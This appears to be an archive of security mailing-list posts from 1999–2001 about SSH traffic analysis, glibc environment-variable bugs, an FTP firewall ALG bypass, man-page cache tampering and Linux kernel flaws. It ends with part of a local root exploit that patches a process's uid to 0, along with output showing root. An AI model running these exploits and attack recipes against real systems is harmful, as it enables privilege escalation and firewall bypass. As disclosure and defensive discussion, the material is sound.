 Fixes
 -

Several SSH implementations have been changed to include fixes which
reduce the impact of some of the traffic analysis attacks described
in this advisory.  It is important to understand that these fixes are
by no means a complete solution to traffic analysis -- only simple
remediation for the most pressing vulnerabilities described above.

OpenSSH:

Fixes have been initially applied to OpenSSH starting with version
2.5.0.  OpenSSH 2.5.2 contains the more complete versions of the
fixes and solves certain interoperability issues associated with the
earlier versions.

PuTTY:

PuTTY 0.52 will include defenses against inferring length or entropy
of initial login passwords, for both SSH-1 and SSH-2.

SSH 1.2.x:

SSH 1.2.x users can use this unofficial patch (the patch is against
version 1.2.27, but applies to 1.2.31 as well).  Please note that a
SSH server with this patch applied will not interoperate with client
versions 1.2.18 through 1.2.22 (inclusive).

- --- ssh-1.2.27.orig/sshconnect.c  Wed May 12 15:19:29 1999
+++ ssh-1.2.27/sshconnect.c Tue Feb 20 08:38:57 2001
@@ -1258,6 +1258,18 @@
 fatal("write: %.100s", strerror(errno));
 }

+void ssh_put_password(char *password)
+{
+  int size;
+  char *padded;
+
+  size = (strlen(password) + (1 + (32 - 1))) & ~(32 - 1);
+  strncpy(padded = xmalloc(size), password, size);
+  packet_put_string(padded, size);
+  memset(padded, 0, size);
+  xfree(padded);
+}
+
 /* Starts a dialog with the server, and authenticates the current user on the
server.  This does not need any extra privileges.  The basic connection
to the server must already have been established before this is called.
@@ -1753,7 +1765,7 @@
 /* Asks for password */
 password = read_passphrase(pw->pw_uid, prompt, 0);
 packet_start(SSH_CMSG_AUTH_TIS_RESPONSE);
- -packet_put_string(password, strlen(password));
+ssh_put_password(password);
 memset(password, 0, strlen(password));
 xfree(password);
 packet_send();
@@ -1791,7 +1803,7 @@
 {
   password = read_passphrase(pw->pw_uid, prompt, 0);
   packet_start(SSH_CMSG_AUTH_PASSWORD);
- -  packet_put_string(password, strlen(password));
+  ssh_put_password(password);
   memset(password, 0, strlen(password));
   xfree(password);
   packet_send();
- --- ssh-1.2.27.orig/serverloop.c  Wed May 12 15:19:28 1999
+++ ssh-1.2.27/serverloop.c Tue Feb 20 08:38:56 2001
@@ -522,6 +522,9 @@
 void process_output(fd_set *writeset)
 {
   int len;
+#ifdef USING_TERMIOS
+  struct termios tio;
+#endif

   /* Write buffered data to program stdin. */
   if (fdin != -1 && FD_ISSET(fdin, writeset))
@@ -543,7 +546,18 @@
 }
   else
 {
- -  /* Successful write.  Consume the data from the buffer. */
+  /* Successful write. */
+#ifdef USING_TERMIOS
+  if (tcgetattr(fdin, &tio) == 0 &&
+  !(tio.c_lflag & ECHO) && (tio.c_lflag & ICANON)) {
+/* Simulate echo to reduce the impact of traffic analysis. */
+packet_start(SSH_MSG_IGNORE);
+memset(buffer_ptr(&stdin_buffer), 0, len);
+packet_put_string(buffer_ptr(&stdin_buffer), len);
+packet_send();
+  }
+#endif
+  /* Consume the data from the buffer. */
   buffer_consume(&stdin_buffer, len);
   /* Update the count of bytes written to the program. */
   stdin_bytes += len;


 SSHOW, the SSH traffic analysis tool
 

We have developed a SSH traffic analysis tool, which can be used to
demonstrate many of the weaknesses described in this advisory.  The
source for initial version of the tool is included below.  Future
versions will be maintained as a part of Dug Song's dsniff package,
available at:

http://www.monkey.org/~dugsong/dsniff/

The raw IP networking libraries required by SSHOW may be obtained at:

http://www.tcpdump.org/release/
    http://www.packetfactory.net/Projects/Libnet/
http://www.packetfactory.net/Projects/Libnids/

<++> sshow.c
/*
 * SSHOW.
 *
 * Copyright (c) 2000-2001 Solar Designer <[EMAIL PROTECTED]>
 * Copyright (c) 2000 Dug Song <[EMAIL PROTECTED]>
 *
 * You're allowed to do whatever you like with this software (including
 * re-distribution in source and/or binary form, with or without
 * modification), provided that credit is given where it is due and any
 * modified versions are marked as such.  There's absolutely no warranty.
 *
 * Note that you don't have to re-distribute modified versions of th

Re: /N grouped concurrency limits for network services

2001-03-05 Thread Solar Designer

On Sat, Mar 03, 2001 at 04:12:46AM -0800, Dan Kaminsky wrote:
> > There's no memory consumption problem with implementing this feature
> > like the Bugtraq post implied.
>
> Sure there is.  To cover the ground of a single /16 ACL, 256 /24 ACLs are
> required.  To cover 256 /16's, 65536 /24's are required.  More memory will
> be needed for the latter than the former.

I've got several e-mails like this, so I am CC'ing the list on this
reply now.

Different people have different kinds of concurrency and/or rate
limiting in mind when talking about this.  Obviously, I was talking
about what I think is reasonable to implement.

Concurrency limiting doesn't run into any memory consumption problem.
The server only needs to maintain information about active sessions.

A reasonable combination of concurrency and rate limiting per source
address, such as what popa3d uses in standalone mode, is similar to
simple concurrency limiting with the difference that the definition
of "active" sessions is changed to include those which were recently
closed.  This implies that only accepted connections cause a "slot"
to be allocated.  Since a single source address (or netblock) could
cause up to a fixed number of slots to be allocated by keeping the
connections open, it doesn't hurt (security-wise) to also leave the
slots allocated for recently-closed connections.  The table of what
is considered an "active" session may be of a fixed size, -- it only
needs to match the server capacity.

Of course, other combinations of concurrency and rate limiting are
possible.

Implementing per-source rate limiting alone and doing so at a lower
layer may run into (solvable) memory consumption problems.

--
/sd



Re: /N grouped concurrency limits for network services

2001-03-01 Thread Solar Designer

On Wed, Feb 28, 2001 at 10:16:47AM +0100, Olaf Kirch wrote:
> Here's something I haven't seen before which I find sort of cool
> (rate limiting grouped by source IP network)...

I've been considering this for popa3d's standalone mode and for
xinetd (both already have a per source IP limit).  xinetd should
implement some defense against the low syslogd bandwidth problem
first (popa3d already has that).

I was going to have a configurable netblock size for use with this
feature, and would set it to /19 by default as that seems reasonable
for present netblock allocations.

Kurt Seifried has some valid concerns regarding IPv6.

Sebastian Krahmer had the opinion that per-source-address limits
actually introduce a DoS possibility.  I mention this here as I
suspect this is a fairly common opinion.  I don't agree.  The DoS
possibility was already there, what the limits do is reduce the
impact of such a DoS.  They also make it (very slightly) easier to
make the service unavailable to those on the same network which
should be considered when configuring the limits, but that is an
acceptable price for the reduced impact of the attack.

The per-source limits are not very different from other limits that
can be configured for a service.  Having a limit of, say, 100 users
logged in to an FTP server prevents the entire physical server from
being DoS'ed and at the same time makes it slightly easier to DoS
just this one service.  We have to choose.  If an implementation of
FTP / *inetd didn't offer the limit, we wouldn't have the choice.

bert hubert wrote:

> I'm not certain weather its best to group ip addresses by /16 or /24 - /24
> might consume too much memory, /16 might be too broad. Perhaps this should
> be a tunable parameter.

There's no memory consumption problem with implementing this feature
like the Bugtraq post implied.

--
/sd



Re: [RHSA-2001:013-05] Three security holes fixed in new kernel

2001-02-09 Thread Solar Designer

On Thu, Feb 08, 2001 at 06:03:00PM -0500, [EMAIL PROTECTED] wrote:
> Thanks to Solar Designer for finding the sysctl bug, and
> for the versions of the sysctl and ptrace patches we used.

Thanks for crediting me, but actually it's Chris Evans who found the
sysctl bug that affects Linux 2.2.  I only provided patches.

I found a very similar sysctl "signedness" bug a few years back,
fixed in Linux 2.0.34, but it's not an issue on Linux 2.2.  So all
credit for the discovery of this new bug is to Chris Evans.

As I am posting this anyway, -- these two fixes (but _not_ the DoS
one, yet) are included in 2.2.18-ow4 and 2.0.39-ow2 patches, which
I've just released:

http://www.openwall.com/linux/

Actually, 2.0.39 only needed the execve/ptrace race condition fix.

--
/sd



Re: summary of recent glibc bugs (Re: SuSE Security Announcement: shlibs/glibc (SuSE-SA:2001:01))

2001-01-31 Thread Solar Designer

On Mon, Jan 29, 2001 at 03:17:17PM -0500, Matt Zimmerman wrote:
> On Sat, Jan 27, 2001 at 05:55:25AM +0300, Solar Designer wrote:
> > The glibc 2.2 RESOLV_HOST_CONF bug which prompted this search for bugs was
> > reported to Debian by Dale Thatcher but apparently wasn't kept private.  The
> > remaining bugs were discovered and dealt with within two days following the
> > RESOLV_HOST_CONF bug report.  As this bug got public, vendors were forced to
> > not coordinate the release of updated glibc packages.
>
> It sounds like you're implying that Debian was responsible for publicizing this
> bug.

Of course not, but I should have been more explicit about that as
some people definitely read it this way.  Sorry for that, :-( and
thanks for your detailed explanation.

> This bug was first discussed (this time around) on VULN-DEV, starting
> here:
>
> http://archives.neohapsis.com/archives/vuln-dev/2001-q1/0024.html
> (dated Sat, 6 Jan 2001 17:23:35 -0500)
>
> Dale Thatcher posted to vuln-dev about the vulnerability in a message dated
> "Mon Jan 08 2001 - 10:30:01 CST", which specifically revealed that unstable
> Debian was vulnerable.
>
> The bug was reported to Debian by thomas lakofski <[EMAIL PROTECTED]> to
> [EMAIL PROTECTED] and [EMAIL PROTECTED] in a message dated
> "Mon, 8 Jan 2001 13:34:52 + (GMT)"
> (http://lists.debian.org/debian-security-0101/msg00011.html).  Note that
> debian-security is a public, archived mailing list, like vuln-dev.
>
> In response to this (public) discussion of the vulnerability, I opened a bug
> (http://bugs.debian.org/81587) against the libc6 package (Mon, 8 Jan 2001
> 10:27:54 -0500) to bring the problem to the attention of the maintainer.  Fixed
> packages were installed into the archive Thu, 11 Jan 2001 14:57:09 -0500.  By
> this time, this vulnerability was clearly already public and being actively
> explored (and probably exploited).

--
/sd



summary of recent glibc bugs (Re: SuSE Security Announcement: shlibs/glibc (SuSE-SA:2001:01))

2001-01-29 Thread Solar Designer

On Fri, Jan 26, 2001 at 03:55:17PM +0100, Roman Drahtmueller wrote:

> The runtime-linker as used in the SuSE distributions ignores the
> content of the critical environment variables if the specified path
> begins with a slash ("/"), or if the library file name is not

s/begins with/contains/
(otherwise "../" attacks would be possible, which isn't the case)

> cached (eg it is contained in a path from /etc/ld.so.conf).
> However, Solar Designer has found out that even preloading glibc-
> native shared libraries can be dangerous: The code in the user-linked

Thanks for crediting me, but this isn't exactly what my contribution
was about.

The fact that preloading "system" libraries can be dangerous was
known before that (discussed a few years ago, including on Bugtraq).
A solution was then introduced to require that the library be "SUID"
for it to be LD_PRELOAD'able into SUID/SGID programs.  On a typical
system, there are no such libraries.

My contribution was to point out that an exploit mentioned by Jakub
Jelinek depended on this check not working.  (I've also shown a way
to exploit this property with glibc 2.1.x, but that isn't really my
discovery as it was prompted by a ChangeLog entry for an attempt to
fix that.)  Ulrich Drepper committed a fix for this preload-non-SUID-
library bug (which turned out to be in the caching you mention in the
advisory) the next day.

(My other contribution was proving that the LD_PROFILE{,_OUTPUT}
handling was indeed a real vulnerability, as suspected by Daniel
Jacobowitz.)

> To eliminate these problems, we provide update packages that completely
> disregard the LD_* variables upon runtime-linking of a binary that has
> an effective uid different from the caller's userid.

I don't see that in SuSE package (libc-2.1.3-190.src.rpm), which seems
to only contain the fixes from the glibc CVS (which are sufficient for
the bugs we're currently aware of).

I sent this summary to vendor-sec (even though most of the bugs were
not discovered by me, this was just to ensure no vendor misses a fix
relevant to versions of glibc they package):

Date: Sat, 13 Jan 2001 03:00:34 +0300

(A few days after the fixes were committed.)

| These are the (instances of) the recently discovered glibc bugs
| (here "2.1" means 2.1 to 2.1.3, and "2.2" means 2.1.9x+):
|
| 1. LD_PRELOAD works for non-SUID libs even when running SUID/SGID.
|
| This affects both glibc 2.1 and 2.2.  The proven way to abuse this
| property is via libSegFault (overwrite any file), but even worse
| attacks (providing a root shell directly) are likely to exist.
|
| Fixed in the CVS.
|
| 2. LD_PROFILE uses a file in /var/tmp even when running SUID/SGID.
|
| Both 2.1 and 2.2.  The file is unsafely created and later mmap'ed
| for processing.  There're memory writes with addresses calculated
| from data in the file, with no bounds checking.  Thus, it definitely
| is possible to overwrite files with this, and it might be possible to
| get a root shell via this vulnerability directly.
|
| Fixed in the CVS by moving the profiling files to /var/profile (which
| should only be created if the feature is desired) for the SUID/SGID
| case.  /var/tmp is still used for non-SUID/SGID programs if run with
| LD_PROFILE set, which I dislike, but this is only a minor problem.
|
| 3. SEGFAULT_OUTPUT_NAME is trusted even when running SUID/SGID.
|
| Both 2.1 and 2.2.  As the library isn't installed SUID by default,
| this is only exploitable due to bug #1.
|
| Not fixed (the access() checks don't count).
|
| 4. MEMUSAGE_OUTPUT is trusted even when running SUID/SGID.
|
| 2.2 only (wasn't a part of glibc 2.1, but could be installed with it
| as well).  Similar to the SEGFAULT_OUTPUT_NAME.
|
| 5. RESOLV_HOST_CONF is trusted even when running SUID/SGID.
|
| 2.2 only.  Fixed in the CVS.

Date: Sun, 14 Jan 2001 14:44:56 +0300

| BTW, these recent bugs are now also fixed in glibc-2-1-branch, thanks
| to Andreas Jaeger.

The glibc 2.2 RESOLV_HOST_CONF bug which prompted this search for
bugs was reported to Debian by Dale Thatcher but apparently wasn't
kept private.  The remaining bugs were discovered and dealt with
within two days following the RESOLV_HOST_CONF bug report.  As this
bug got public, vendors were forced to not coordinate the release of
updated glibc packages.

--
/sd



Re: Extending the FTP "ALG" vulnerability to any FTP client

2000-03-14 Thread Solar Designer

Hello,

>   * Send a HTML email to an HTML-enabled mail reader
> containing the tag
> ftp://ftp.rooted.com/[lots of A]aaaPORT 1,2,3,4,0,139">

I was playing with that recently as well.  Yes, this works.  Some
browsers add an extra "/" to such requests (at least on the first
check, for a directory), so one might want to add %0d%0a to the end.

It's also important that this is either an ftp URL, or some other
text-based protocol directed to 21/tcp (such as, http://server:21).

>   * Balance the number of A so that the PORT command will begin
> on a new packet boundary. This may also be done by having
> the server use a low TCP MSS to decrease the number of A's that
> one has to add.

This is not always necessary.  Linux's ip_masq_ftp module is happy to
detect PORT anywhere in packets travelling to 21/tcp.

>   * The firewall in question will incorrectly parse the resulting
> RETR /[]aPORT 1,2,3,4,0,139
> as first a RETR command and then a PORT command and open
> port 139 against your address (1.2.3.4 in this case)

It will also translate the PORT command, so that ftp.rooted.com sees
the firewall's IP address and port number that's currently redirected
to client:139.

>   * Disable active FTP. E, wait. The fix for the server side
> vulnerability was to disable passive FTP. Let's rephrase that:
>
>   * Disable FTP altogether. Block port 21. Disable FTP Application
> Layer Filters on all ports in your firewall.

There's a partial workaround: only allow access to non-privileged
ports.  Yes, there can still be vulnerable services on those. :-(
I haven't tested if this would work with real-world FTP clients on
Win32 -- are there any that would use privileged ports?

>   * If you can't change the settings in your firewall, set the
> "FTP Proxy" setting in your browser/HTML-enabled mail reader
> to some address that doesn't exist, like 127.0.0.2. After
> this change, your browser won't be able to connect anywhere
> using FTP.

That doesn't help against the http://...:21 trick.

Signed,
Solar Designer



Re: WordPad/riched20.dll buffer overflow

1999-11-30 Thread Solar Designer

> Aleph, please kill my article if someone else says it better/first.  I've been
> waiting in silence for Solar Designer to speak up and end the debate about how
> to do this, but I guess he's away from his e-mail.

I was simply unsure if we really need to repeat this discussion (it's
been on the list already). ;-)

> > Having separate non-overlapping stack and data segments causes a great
> > many problems if you want to be able to write programs in C, given
> > that a data pointer has to be able to record the address of any
> > variable, regardless of whether it is static (data segment) or
> > automatic (stack segment).
>
> This work has already been done:  there is a kernel patch for Linux that makes
> the stack segment non-executable.  For details, go read Solar's source:
> http://www.openwall.com/linux/

In reality, the patch does exactly what it says it does: make the
user stack area (a range of user-space addresses) non-executable.

It does _not_ make the segment (in the x86 sense) non-executable (in
fact, it was already non-executable by definition; it is overlapping
with the code segment which allowed for execution on the stack).

To answer the paragraph you were replying to as well, the patch also
does _not_ stop stack and data segments from overlapping (in fact,
with the Linux 2.2 version of the patch, the stack and data segments
even share the same descriptor table entry).  I don't see how this
restriction can be related to the execute permissions, though.

What the patch does, is reduce the user-space code segment limit so
that the segment does not cover the range of addresses allocated to
the stack.  The base addresses continue to match.

Signed,
Solar Designer



Re: CERT Advisory CA-99-14 Multiple Vulnerabilities in BIND

1999-11-13 Thread Solar Designer

Hello,

> course, recommend upgrading.  In addition, we recommend running your
> nameserver as non-root and chrooted (I know setting this up is non-trivial --
> it'll be much, much easier in BINDv9).

While we're on the topic, there's a patch for running BIND 4.9.7 as
non-root and chrooted, as well as instructions on setting up the
jail, at:

http://www.openwall.com/bind/

Signed,
Solar Designer



Re: Local user can send forged packets

1999-10-27 Thread Solar Designer

>
> Several daemons drop privilege, you stop them restoring the state and thus
> expose a new exciting hole. Just copy the 2.2 fix - stop the ldisc open, that
> enforces what you need.

I've done that for 2.0.38-ow4, which also includes some ELF loader
fixes for issues (DoS) found by Pavel Kankovsky, and a few more.

Signed,
Solar Designer



Re: Compaq Alpha Bounds Checking

1999-10-21 Thread Solar Designer

> In this post below to the Linux security-audit mailing list, Solar was kind
> enough to fulfill my request for performance data on the Compaq ccc compiler
> for Linux/Alpha using bounds checking.  Astonishingly, Solar's tests showed
> virtually no performance overhead for bounds checking.  I found this to be
> both amazing and depressing for StackGuard, and went away to sulk :-)

Sorry for not answering your last post for that long -- it's still in
my mailbox, and was going to be answered once I have the time.

> Today, I got my own access to an Linux/Alpha box with ccc, and to a Tru64
> box.  Both support the "-check_bounds" switch.  I did my own testing, and
> discovered that as far as I can tell, "-check_bounds" does NOTHING AT ALL.
> Am I missing something?

Yes, I guess so -- see below.

>  foo() {
>  char x[50];
>
>  gets(x);
>  }

I would _not_ expect this case to be covered by the compiler's bounds
checking.  This is in fact the reason I didn't use a strcpy() when
demonstrating the bounds checking to you in my first post about ccc.
Their bounds checking only applies to explicit array subscripts:

   -[no]check_bounds
   Generates  runtime  code  to check the values of array
   subscripts (and equivalent pointer arithmetic  involv-
   ing pointers produced by converting an array name to a
   pointer) to verify that  the  resulting  address  lies
   within  the  range  for  which the C standard requires
   well-defined behavior.

This was so obvious for me that I forgot to mention this on the list,
sorry.  Now I realize that when saying "bounds checking" people often
mean "complete protection", or close to that (with DoS in mind).

Speaking of the usage of gets() and such, even if the compiler was
able to pass bounds checking information down to functions (which ccc
doesn't do), it would at least require that you also recompile those
functions themselves.

> Thus I conclude that Solar's amazing performance results that show no
> overhead are because the compiler is lying about implementing bounds
> checking.  There is no overhead because there is no protection.

Well, they could be more verbose in their description, yes.  As for
the "no protection" -- this wasn't meant as a security feature, but
there's _some_ protection, it's just far from being complete.

Finally, as this also goes to BugTraq this time, here's a piece of my
first post on the subject that shows a case where bounds checking can
work (and does indeed work) --

[ghost@alice tests]$ cat bounds.c
#include 

int f(int n, int m)
{
char buffer[100];
int i;

for (i = 0; i < n; i++)
buffer[i] = 'x';

return buffer[m];
}

int main(int argc, char **argv)
{
return f(atoi(argv[1]), atoi(argv[2]));
}
[ghost@alice tests]$ gcc bounds.c -o bounds -O -s
[ghost@alice tests]$ ./bounds  33
Segmentation fault
[ghost@alice tests]$ ./bounds 99 33
[ghost@alice tests]$ ccc bounds.c -o bounds -O
[ghost@alice tests]$ ./bounds  33
Segmentation fault
[ghost@alice tests]$ ccc bounds.c -o bounds -O -check_bounds
[ghost@alice tests]$ ./bounds  33
Trace/breakpoint trap
[ghost@alice tests]$ ./bounds 99 
Trace/breakpoint trap
[ghost@alice tests]$ ./bounds
Segmentation fault
[ghost@alice tests]$ ./bounds 99 33
[ghost@alice tests]$

The first two compiles are with gcc and ccc w/o bounds checking.  We
get segfaults.  Then the program is recompiled with bounds checking,
and we're now getting those traps (just like the man page says).  The
last two tests are to show that the traps are only generated from
bounds checking and not other errors, and that the program is still
working.  BTW, here's what the checks look like:

mov $3, $5
cmpule  $3, 99, $16
bne $16, L$10
mov -18, $16
call_pal 0xAA # gentrap
L$10:
[ ... some code skipped: the loop got unrolled and large ... ]
addq$sp, $5, $8
    ldq_u   $16, ($8)

I wouldn't say that the option did "nothing at all" to SSH -- it must
have added quite a few checks, which made the binary 5 KB larger.

Signed,
Solar Designer



Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]

1999-09-28 Thread Solar Designer

Hi,

> This is from a post I made to BugTraq on September 17, entitled
> "A few bugs...".  If you're running Linux, it appears kernels pre 2.1 will
> not be affected by this bug as they do not follow symlinks when creating
> UNIX domain sockets (Solar Designer pointed this out after trying the
> exploit on a 2.0.38 kernel; I tested on a 2.0.34 kernel, and from there
> I'm generalizing).

The same applies to mknod(2), which follows dangling symlinks on
Linux 2.2, but doesn't on 2.0.  I've changed the code not to follow
such symlinks for both mknod(2) and bind(2), in 2.2.12-ow6.

As I am posting this anyway, -- other changes to the -ow patch for
2.2 since I've announced it here include the real exit_signal fix,
and the TCP sequence number fix I took from 2.2.13pre14.  (Speaking
of the latter, it's funny how most of the randomness went into the
wrong place on the stack, and probably remained unnoticed because of
the fairly large and unused at the time "struct tcp_opt".  2.0 isn't
vulnerable.  Yet another reason to continue running 2.0.38.)

Signed,
Solar Designer



Linux 2.2.12 mini-audit

1999-09-13 Thread Solar Designer
ngths of
individual arguments.  I've even managed to make it have the same
performance that it used to; the new count() function looks a bit
like a puzzle because of that, though.  Actually, this is something
that should have been done earlier; now it can only remain in my
2.0.38 patch.

(2.0.38) (2.2.12) (*)
/proc/ directories, and /proc//fd symlinks could also be
accessed with any amount of zeroes prepended to their names.  This
could be used, say, to obtain an overly long cwd.  There's no obvious
security impact, but something to be fixed anyway (and that has been
done).

(2.0.38) (2.2.12) (*)
CLONE_PID could be set from the user-space, thus producing two user
processes with the same PID.  Attacks include: stopping SUID programs
from sending signals to themselves (even raise(3) wouldn't work),
covering your high resource usage by the other dummy process, making
unkillable processes that can still be running just fine (covered by
dummy zombie processes with the same PID).

(2.0.38) (2.2.12)
It is possible to request any exit_signal, not just SIGCHLD, via
clone(2).  This is normally not a problem, but there's one exception:
the parent could have executed a SUID program, and that program could
have done a "setuid(geteuid())", expecting to protect itself from
signals sent by the original user.  This feature of clone(2) can be
used to send an arbitrary signal to such a program.  I've put a
workaround into my patches, that restricts the allowed signal numbers
to SIGCHLD, SIGUSR1, SIGUSR2, or no signal, with SIGUSR1 and SIGUSR2
allowed specifically for LinuxThreads to work.  This also means that
SUID programs which use LinuxThreads remain unprotected.  A solution
to this should be developed.  I've proposed one in a comment in the
patches, and Pavel Kankovsky has offered another one.  Unfortunately,
both of them have some (different) disadvantages.  This problem isn't
fixed in 2.2.13pre7, and isn't likely to be any time soon. :-(

(2.2.12) (*)
We have now reverted to the behavior of chown(2) we had in 2.0: reset
SUID/SGID bits on ownership change even if done by root.  Until now,
Linux 2.2 didn't do that for root (and not even for CAP_FSETID, like
it was supposed to do), which allowed for some races that have been
discussed on the security-audit list a few months ago.

(2.0.38) (+)
Linux 2.0's version of process_unauthorized() forgot to check the
dumpable flag, so it was possible to access memory of a SUID process
a user has started, via PID re-use.  Linux 2.2 did the right thing,
and isn't vulnerable.

(2.0.37 with secure-linux-11) (+)
I don't like it when others fix their vulnerabilities silently, so I
won't do so myself. :-)  It was possible to bypass some restrictions
of CONFIG_SECURE_PROC via PID re-use in 2.0.36 and 2.0.37 kernels
with my patches.  I simply didn't re-check the code closely enough
when updating the patch for 2.0.36.  Thanks to Pavel Kankovsky for
noticing this.

(2.0.38) (2.2.12) (+)
User-space values of the instruction and stack pointers are available
via /proc, -- for every process in the system, and to everyone.  This
information should in fact be treated just as private as the address
space of the processes (such a patch will likely get into 2.2.13pre
soon).  Imagine a crypto algorithm implementation that does branches
based on its key bits.  Thanks to Thomas <[EMAIL PROTECTED]>, who has
reported this to me (but underestimated the impact).

One final note: I am still going to fix all 2.0.38 security issues
that are any serious, in my patches, for a few months more.

Signed,
Solar Designer



Re: Linux blind TCP spoofing, act II + others

1999-08-09 Thread Solar Designer

>
> It was put back into 2.0.35 because the "fix" caused interoperability
> problems with many other stacks.

I've discussed those interoperability problems with Alan (thanks!),
and have now updated my 2.0.37 patch to include a fix that shouldn't
cause them any more:

http://www.false.com/security/linux/

I must also thank Nergal for testing the patch.

Signed,
Solar Designer



Re: Linux blind TCP spoofing, act II + others

1999-08-05 Thread Solar Designer

Hello,

> I notified kernel mantainers in May, but they didn't seem interested.

Perhaps everyone cares about 2.2 and 2.3 only these days.

>   So, when an attacker sends (as a third packet of tcp handshake) a
> packet with too small ack_seq, the server sends no packets (doesn't it
> violate RFC793 ?). When a packet with too big ack_seq is sent, the server
> sends a packet (with a reset flag).

I've first heard of this behavior from Coder's IP-spoof.2.  He didn't
realize this was a bug until I told him, though.

My secure-linux patch for 2.0.33 included a fix for this (and a few
other bugfixes, all enabled with its CONFIG_SECURE_BUGFIX option):

+#ifdef CONFIG_SECURE_BUGFIX
+   return 0;
+#else
return 1;
+#endif

That's the last "return" in tcp_ack(), in linux/net/ipv4/tcp_input.c.
A zero return from tcp_ack() means a failed handshake, and generates
an RST packet.  Then 2.0.34 came out, and some of my bugfixes got in,
including this one.  From patch-2.0.34.gz:

-   return 1;
+   return 0;

So, the version of my patch for 2.0.34 didn't need to fix this any
more.  Of course, future updates of the patch I was making based on
the latest one, and never bothered to check for this bug again.

Now, after your post, I am looking at patch-2.0.35.gz:

-   return 0;
+   return 1;

So, the "feature" got re-introduced in 2.0.35.  I don't know of the
reason for this.  I can only guess that the other major TCP changes
in 2.0.35 were originally based on a version of the code older than
the one in 2.0.34, but only got into 2.0.35.  The other guess is, of
course, that this change caused problems in 2.0.34, but I doubt it.

>   Now let's recall another Linux feature. Many OSes (including Linux)
> assign to ID field of an outgoing IP datagram consecutive, increasing
> numbers (we forget about fragmentation here; irrelevant in this case). That

Somehow I didn't think of this at the time (was before this ID stuff
got to BugTraq), so I tried playing with packet count obtained from
the router via SNMP.  Never got my exploit reliable enough, though.

>   At the end of this post I enclosed an exploit; don't use it without
> the permission of the target host's admin. I tested it on 2.0.37, 36 and 30;
> probably all 2.0.x are affected. It requires libnet (which can be downloaded

Except for 2.0.34 and 2.0.33 with my patch, I believe.  I would
appreciate it if you could test the exploit on any of those, so that
I could put the fix back into my patch for 2.0.37.

Signed,
Solar Designer



SGID man

1999-08-02 Thread Solar Designer

>
> > Let me give an example: because man is setuid to the man uid, the binary
> > must be owned by uid man.
>
> That is why it should be setgid to man, and not setuid. sgid has the
> same benefits in added privilegies for the user to read or write in
> special directories, but is less obvious how to elevate these
> privilegies to get more privilegies.

I wouldn't normally post this, but while we're on the topic...
There's an ancient problem with SGID man that I keep seeing on
various systems.  For example, on Red Hat 5.2:

[ghost@alice ghost]$ ls -l /var/catman/cat1/id.1.gz
ls: /var/catman/cat1/id.1.gz: No such file or directory
[ghost@alice ghost]$ man id
Formatting page, please wait...
[ghost@alice ghost]$ ls -l /var/catman/cat1/id.1.gz
-r--rw-r--   1 ghostman   806 Aug  1 06:14 /var/catman/cat1/id.1.gz
[ghost@alice ghost]$ chmod u+w /var/catman/cat1/id.1.gz
[ghost@alice ghost]$ echo haha | gzip > /var/catman/cat1/id.1.gz
[ghost@alice ghost]$ chmod u-w /var/catman/cat1/id.1.gz

The next day, another user wants to know how to use "id":

[luser@alice luser]$ man id

Guess what they will see.

Solutions?  We could change the permissions on those directories from
775 or 1777 (that's what I've seen on various systems) to 770, so
that group man is always required.  However, doing so would break
things, as the group is (and should be) dropped for many operations.
Some changes to the way man works would be required to support such
restricted permissions.  A workaround could be to preformat all the
man pages as root.  Finally, we could move to a SUID man, making the
binary immutable (non-portable, not backup friendly).  I don't like
any of these.

In my opinion, it is time to stop storing preformatted pages.  It is
no longer worth the risk.  CPUs got faster, man pages are the same.

Signed,
Solar Designer



Linux 2.0.37 segment limit bug

1999-07-12 Thread Solar Designer
  if (setrlimit(RLIMIT_FSIZE, &new))
new.rlim_cur = old.rlim_cur;

do {
((int *)task)++;
} while (task->pid != pid || task->uid != uid);

if (task->rlim[RLIMIT_FSIZE].rlim_cur != new.rlim_cur) goto search;

if (setrlimit(RLIMIT_FSIZE, &old)) {
perror("setrlimit");
return 1;
}

if (task->rlim[RLIMIT_FSIZE].rlim_cur != old.rlim_cur) goto search;

printf("found at %p\nPatching the UID... ", task);

task->uid = 0;
setuid(0);
setgid(0);
setgroups(0, NULL);

puts("done");

execl("/usr/bin/id", "id", NULL);
    return 1;
}

Its output, with CONFIG_MAX_MEMSIZE=1800 (the very first example
given in linux/Documentation/more-than-900MB-RAM.txt):

Searching for the descriptor... found at 0x8f9068ac
Extending its limit... done
Searching for task_struct... found at 0x9157d810
Patching the UID... done
uid=0(root) gid=0(root)

Signed,
Solar Designer